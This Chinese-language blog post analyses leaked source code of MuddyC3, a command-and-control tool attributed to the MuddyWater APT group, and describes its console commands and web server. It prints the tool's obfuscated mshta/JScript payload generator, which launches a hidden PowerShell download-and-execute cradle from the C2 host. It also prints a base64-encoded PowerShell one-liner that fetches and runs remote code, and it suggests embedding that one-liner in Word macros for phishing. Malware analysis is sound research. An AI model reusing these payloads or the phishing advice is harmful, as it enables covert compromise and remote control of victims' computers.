APT组织武器:MuddyC3泄露代码分析

2019-11-06 14:01:35 浏览数 (1)

微信公众号:七夜安全博客 关注信息安全技术、关注 系统底层原理。问题或建议,请公众号留言。

MuddyC3简介

MuddyC3是MuddyWater组织自研的渗透工具,基于Python的B/S架构。安全研究人员在Github上发布了相关恶意样本和反编译的源码,从代码的完整度和功能上,看出应该是早期版本,版本为1.0.0。

GitHub 地址:https://github.com/0xffff0800/muddyc3

再说一些这个apt组织,MuddyWater被普遍认为是一个来自中东地区的,长期活跃的APT组织。从2019年2月到4月,该组织发起了一系列针对土耳其、伊朗、阿富汗、伊拉克、塔吉克斯坦和阿塞拜疆的政府、教育机构、金融、电信和国防公司的网络钓鱼电子邮件攻击。

APT组织总是给人一种神秘强大的感觉,但并不意味着高不可及,无法触摸。本文就简要分析一下MuddyC3的代码,其实咱们也可以做到。

基本结构

MuddyC3 v1.0.0的代码量不大,结构还是比较清晰的,是个传统的B/S架构。控制端是基于web.py的服务端,而被控端使用了多种payload对机器进行控制,并和控制端进行http通信。

代码结构中:

  • muddyc3.py用来启动web端,并显示命令参数和功能
  • core目录下是核心代码,主要包括交互命令,加密以及web服务。
  • lib目录下的web是web.py的库代码,prettytable.py是用来打印表格。
muddyc3.py

分为两部分功能:

1.生成被控端的木马payload,用户填入C&C服务器的ip和port,是基于powershell的,用于无文件攻击用户电脑.

2.启动webserver,与被控端进行通信,并在命令行接受黑客下一步的指令。

core核心代码

讲解一下core目录下的cmd.py和webserver.py文件。cmd.py中介绍了6种命令,但其中show命令没有实现。list命令用于列举所有的受控端,use命令用来与受控端进行交互。

代码语言:javascript复制
HELPCOMMANDS = [
        ['exit','Exit the console'],
        ['list','List all agents'],
        ['help','Help menu'],
        ['show','Show Command and Controler variables'],
        ['use','Interact with AGENT'],
        ['back','Back to the main']
        ]

list命令主要列举受控端的用户名,机器名,系统版本以及内外网ip。

webserver实现了多种http接口,用来和受控端交互。受控端可以从服务端获取多种payload(可以加密),上传,下载文件,命令执行,以及保持心跳。

其中mshta.exe的payload比较有意思,还做了一些简单加密和混淆,防止进行安全人员进行解析。

代码语言:javascript复制
class mshta:
    def GET(self):
        ip = web.ctx.ip
        p_out = '[ ] New Agent Request PAYLOAD (%s)'%(ip)
        print bcolors.OKGREEN   p_out   bcolors.ENDC
        code = '''
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try
{
    window.onfocus = function() { window.blur(); }
    window.onerror = function(sMsg, sUrl, sLine) { return false; }
}
catch (e){}

function replaceAll(find, replace, str)
{
  while( str.indexOf(find) > -1)
  {
    str = str.replace(find, replace);
  }
  return str;
}
function bas( string )
    {
        string = replaceAll(']','=',string);
        string = replaceAll('[','a',string);
        string = replaceAll(',','b',string);
        string = replaceAll('@','D',string);
        string = replaceAll('-','x',string);
        string = replaceAll('~','N',string);
        string = replaceAll('*','E',string);
        string = replaceAll('%','C',string);
        string = replaceAll('$','H',string);
        string = replaceAll('!','G',string);
        string = replaceAll('{','K',string);
        string = replaceAll('}','O',string);
        var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=";
        var result     = '';

        var i = 0;
        do {
            var b1 = characters.indexOf( string.charAt(i  ) );
            var b2 = characters.indexOf( string.charAt(i  ) );
            var b3 = characters.indexOf( string.charAt(i  ) );
            var b4 = characters.indexOf( string.charAt(i  ) );

            var a = ( ( b1 & 0x3F ) << 2 ) | ( ( b2 >> 4 ) & 0x3 );
            var b = ( ( b2 & 0xF  ) << 4 ) | ( ( b3 >> 2 ) & 0xF );
            var c = ( ( b3 & 0x3  ) << 6 ) | ( b4 & 0x3F );

            result  = String.fromCharCode(a)   (b?String.fromCharCode(b):'')   (c?String.fromCharCode(c):'');

        } while( i < string.length );

        return result;
    }

var es = '{code}';
eval(bas(es));
</script>
<hta:application caption="no" showInTaskBar="no" windowState="minimize" navigable="no" scroll="no" />
</head>
<body>
</body>
</html>

'''
    js = '''

var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://{ip}:{port}/get'));";
var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');
w32ps.SpawnInstance_();
w32ps.ShowWindow=0;
var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null);
'''
    js = js.replace('{ip}',config.IP).replace('{port}',config.PORT)
    js = js.encode('base64').replace('n','')
    re = [[']','='],['[','a'],[',','b'],['@','D'],['-','x'],['~','N'],['*','E'],['%','C'],['$','H'],['!','G'],['{','K'],['}','O']]
    for i in re:
        js = js.replace(i[1],i[0])
        return code.replace('{code}',js)

运行一下

将下面打印出来的powershell payload在目标机器上运行一下,就会被控制。可以将代码放到word宏中,钓鱼执行。

代码语言:javascript复制
Start-Process powershell -ArgumentList
"iex([System.Text.Encoding]::ASCII.GetString([System.Convert]
::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVt
OZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGl
hbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG9
3bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMTMuOTcuMzUuMTU4OjgwMDEvZ2V0Jyk7SUVYKCRzKQ==')))"
 -WindowStyle Hidden

0 人点赞